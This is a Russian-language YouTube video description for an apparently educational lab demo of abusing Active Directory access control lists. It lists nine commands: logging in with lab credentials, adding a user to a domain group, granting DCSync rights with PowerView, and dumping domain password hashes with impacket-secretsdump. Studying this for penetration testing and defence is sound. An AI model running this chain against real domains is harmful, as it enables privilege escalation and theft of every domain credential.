Злоупотребление ACLs
Thatquietkid
0:00 / 0:00
Злоупотребление ACLs
609 просмотров · 2 года назад
Thatquietkid
1,13 тыс. подписчиков
609 просмотров · 2 года назад
Добро пожаловать на мой YouTube-канал. В этом видео я подробно рассматриваю злоупотребление списками контроля доступа (ACL), стремясь предоставить ценную информацию и образовательный контент.
Образовательная цель:
Узнайте, как использовать уязвимости ACL в среде Active Directory.
Отказ от ответственности:
Это видео предназначено исключительно для образовательных целей. В нем рассматривается вектор атаки на Active Directory — злоупотребление ACL. Я не одобряю и не поощряю какие-либо неэтичные или злонамеренные действия.
Соответствие правилам сообщества:
Я придерживаюсь правил и стандартов сообщества YouTube. Если у вас есть какие-либо вопросы или замечания, пожалуйста, свяжитесь со мной, и я отвечу на них оперативно.
Использованные команды:
1) crackmapexec smb 10.0.2.16 -u abuse -p 'ACL@rocks'
2) xfreerdp /u:abuse /p:ACL@rocks /v:10.0.2.28
3) net group "ACLabuse" /domain
4) net group "ACLabuse" abuse /add /domain
5) $SecPassword = ConvertTo-SecureString 'ACL@rocks' -AsPlainText -Force
6) $Cred = New-Object System.Management.Automation.PSCredential('BERSERK.local\abuse', $SecPassword)
7) . .\PowerView.ps1
8) Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'test' -TargetIdentity 'BERSERK.LOCAL\Domain Admins' -Rights DCSync
9) impacket-secretsdump BERSERK.local/abuse:'ACL@rocks'@10.0.2.16